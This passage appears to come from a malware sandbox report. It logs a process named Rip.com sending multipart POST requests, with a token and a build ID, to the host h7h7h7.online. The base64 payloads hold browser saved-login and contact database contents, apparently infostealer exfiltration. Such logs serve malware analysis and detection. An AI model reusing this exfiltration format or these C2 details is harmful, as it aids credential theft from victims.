                                                                                                                                                                                                                                                              2024-12-31 20:40:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 38 67 64 74 72 71 69 6d 79 75 73 72 69 6d 67 64 62 61 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 38 67 64 74 72 71 69 6d 79 75 73 72 69 6d 67 64 62 61 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 38 67 64 74 72 71 69 6d 79 75 73 72 69 6d 67 64 62 61 31 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------8gdtrqimyusrimgdba1dContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------8gdtrqimyusrimgdba1dContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------8gdtrqimyusrimgdba1dCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:26 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:26 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:27 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              15192.168.2.449770116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----biwt0r9hvai5f379z5pz
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 142457
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 62 69 77 74 30 72 39 68 76 61 69 35 66 33 37 39 7a 35 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 62 69 77 74 30 72 39 68 76 61 69 35 66 33 37 39 7a 35 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 62 69 77 74 30 72 39 68 76 61 69 35 66 33 37 39 7a 35 70 7a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------biwt0r9hvai5f379z5pzContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------biwt0r9hvai5f379z5pzContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------biwt0r9hvai5f379z5pzCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                              Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:27 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:28 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              16192.168.2.449771116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:28 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----oz5fcjm79riw479rq1no
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 493
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:28 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 6f 7a 35 66 63 6a 6d 37 39 72 69 77 34 37 39 72 71 31 6e 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 6f 7a 35 66 63 6a 6d 37 39 72 69 77 34 37 39 72 71 31 6e 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6f 7a 35 66 63 6a 6d 37 39 72 69 77 34 37 39 72 71 31 6e 6f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------oz5fcjm79riw479rq1noContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------oz5fcjm79riw479rq1noContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------oz5fcjm79riw479rq1noCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              17192.168.2.449772116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----9z5fu3ohlnycjmycjw47
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 169765
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------9z5fu3ohlnycjmycjw47Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------9z5fu3ohlnycjmycjw47Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------9z5fu3ohlnycjmycjw47Cont
